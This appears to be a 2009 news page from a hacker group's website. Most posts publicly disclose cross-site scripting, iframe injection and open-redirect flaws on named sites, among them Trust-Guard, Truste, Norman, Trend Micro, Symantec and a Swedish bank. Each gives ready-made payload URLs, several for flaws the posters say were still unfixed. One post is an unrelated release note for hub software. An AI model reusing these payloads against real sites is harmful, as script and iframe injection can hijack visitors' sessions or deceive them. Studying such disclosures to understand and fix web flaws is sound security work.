Nemesis Our Projects Forums Extra Controls
  RegMe

News


Hacker-safe vs Trust-Guard vs Truste

Hacker-safe vs Trust-Guard vs Truste
  
Multiple HTML Injection Vulnerability

hackersafe.com.tr

vulnerable page:

Code:
http://www.hackersafe.com.tr/merchants/moreinfo.htm
  
Code:
http://hackersafe.com.tr/mail.php

Code:
http://hackersafe.com.tr/mail2.php


http://img145.imageshack.us/img145/1280/89767110.jpg


Trust-Guard - XSS,Redirect and Iframe injecxtion

Code:
http://blog.trust-guard.com/?s="><script>alert(String.fromCharCode(88,83,83))</script>

Code:
http://blog.trust-guard.com/?s=">"">>>><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""



http://img407.imageshack.us/img407/1584/36759027.jpg
http://img407.imageshack.us/img407/9493/22598724.jpg

Code:
https://secure.trust-guard.com/ResetPassword.php
  

The same bug on login module !

http://img29.imageshack.us/img29/3552/61673649.gif

http://img29.imageshack.us/img29/7527/50370154.gif


Truste.org - XSS & Iframe injection

Code:
http://blog.truste.org/index.php?s="><script>alert(String.fromCharCode(88,83,83))</script>


Code:
http://blog.truste.org/index.php?s="><iframe src=http://nemesis.te-home.net></iframe>


Vulnerable page on truste.org

Code:
http://www.truste.org/forms/learn_more.php


http://img366.imageshack.us/img366/8851/90848824.gif

http://img366.imageshack.us/img366/4775/15714262.gif  

How someone can sell Security Certificate when his security are 0 ?

Submitted on 2009-06-22 by [-TE-]-Methodman (0 comments)

HeXHub 5.04

New release of HeXHub - version 5.04.

Changes:
  • corrected: error while allocating cache buffers (thanks to Takel for reporting this error)
  • corrected: if securepass was enabled, it was always required when registering on website
  • added: new setting to re-scan plugins: !set ext rescan (requested by Maximum)
  • added: support for Keep-Alive connections
  • added: new parameter "post" that is used to prevent IE from reposting form data
  • the !seen command can be forced to search for a nick in case the nick starts with a number if a "." is appended to it - !seen. nick (requested by RoLex)
  • the right adm6 is needed to see copyright information for installed plugins with !about


Also, TEext was updated to version 7.02b. This version can crash DDoS bots when they attempt to send CTM's with wrong IP. Some DDoS bots join more than one hub, and most of them attempt to exploit any hubsoft with any version. When TEext detects an exploitation attempt, it will flood the bot with new nicks to fill its nicklist (all bots add fake nicks to their own nicklist). It is enough for one hub to crash a bot to get it out of all hubs it is in. For this, you need to enable crashing clients of spammers in TEext and to change the following restrictions for $ConnectToMe:
Code:
!set cmd connecttome keeplast off
!set cmd connecttome fromone 40 / m
!set cmd connecttome notifyip on


Submitted on 2009-06-11 by Vektor (0 comments)

Norman Security Company without Security

XSS,Iframe injection and open Redirect bugs

More info about Norman  http://www.norman.com/about_norman/en

Poc:

Code:
http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="><script>alert(String.fromCharCode(88,83,83))</script>


Code:
http://www.norman.com/site_search/en?searchString%3Autf8%3Austring="><iframe src=index.htm


Code:
http://www.norman.com/support/support_issue_archive/67744/en?msg:utf8:ustring="<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='250%' height='600px' src='http://nemesis.te-home.net'>



http://img30.imageshack.us/img30/6487/20434663.jpg

http://img30.imageshack.us/img30/6507/49142097.jpg

http://img3.imageshack.us/img3/131/71831352.jpg


This is just a Proof of Concept so be carefull !

Submitted on 2009-06-08 by [-TE-]-Methodman (0 comments)

XSS Flaw on Trendmicro and Symantec


The staff has been alerted but still no response, so please leave here an valid email.

Trendmicro

http://img21.imageshack.us/img21/8430/63154973.jpg

http://img21.imageshack.us/img21/229/21to.jpg

POC:- xss + iframe injection

Code:
http://enterprise.trendmicro.com/pr/tm/en-us/enterprise/podcast-post.aspx?id=433}"><script>alert(String.fromCharCode(88,83,83))</script>


http://img21.imageshack.us/img21/1610/111wkk.jpg

Code:
http://enterprise.trendmicro.com/pr/tm/en-us/enterprise/podcast-post.aspx?id=433}"<IMG src='http://nemesis.te-home.net'><BR><BR><IFRAME width='230%' height='600px' src='http://nemesis.te-home.net'>

http://img9.imageshack.us/img9/3194/333ojv.jpg

Symantec

http://img21.imageshack.us/img21/9488/symp.jpg

http://img21.imageshack.us/img21/7919/67853961.jpg  

and another old bug ,reported 2 times but still not fixed :)

Code:
http://www.symantec.com/connect/security/forums/endpoint-protection'"></title><script>alert(xss)</script>><marquee><h1>XSS</h1></marquee>
  
Code:
http://www.symantec.com/connect/security/forums/endpoint-protection''>'><script>alert(12135285.117)</script>&e404=>'><script>alert(12135285.117)</script>


Remember,to see the POC you need to use https(hyper text transport protocol secure) not http

Update: XSS found by Vektor on https://www-secure.symantec.com/:

http://img10.imageshack.us/img10/7530/nortonxss.gif

Proof of concept: https://www-secure.symantec.com/techsupp/jsp/ratethis/nein.jsp?url=http%3A%2F%2Fservice1.symantec.com%2Fsharedtech.nsf%2F0%2Fd59068009e7f27b965257287005fd39d%3FOpenDocument%26%27%3C/li%3E%3C/ul%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cimg%20src=%22http://images.encyclopediadramatica.com/images/2/24/Norton_Godfather2.gif%22%3E%3C!--


Submitted on 2009-05-30 by [-TE-]-Methodman (0 comments)

SEB.se search vulnerable to XSS

The bug i found was located in their search module:
http://img20.imageshack.us/img20/9199/seb1.jpg


http://img3.imageshack.us/img3/4999/seb2d.jpg


How it could be exploited:
Code:
http://taz.vv.sebank.se/cgi-bin/pts3/pos/sebse-wr.asp?ServerKey=Primary&collection=sebse&ResultStart=0&defaultText=Sök+på+seb.se&lang=se&QueryText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E



Note: I waited until the problem was resolved to post this

Submitted on 2009-05-30 by [-TE-]-Molotov (0 comments)



Older